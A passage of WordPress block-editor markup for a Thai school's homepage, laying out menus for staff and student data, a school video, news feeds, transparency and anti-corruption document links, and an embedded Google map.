data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 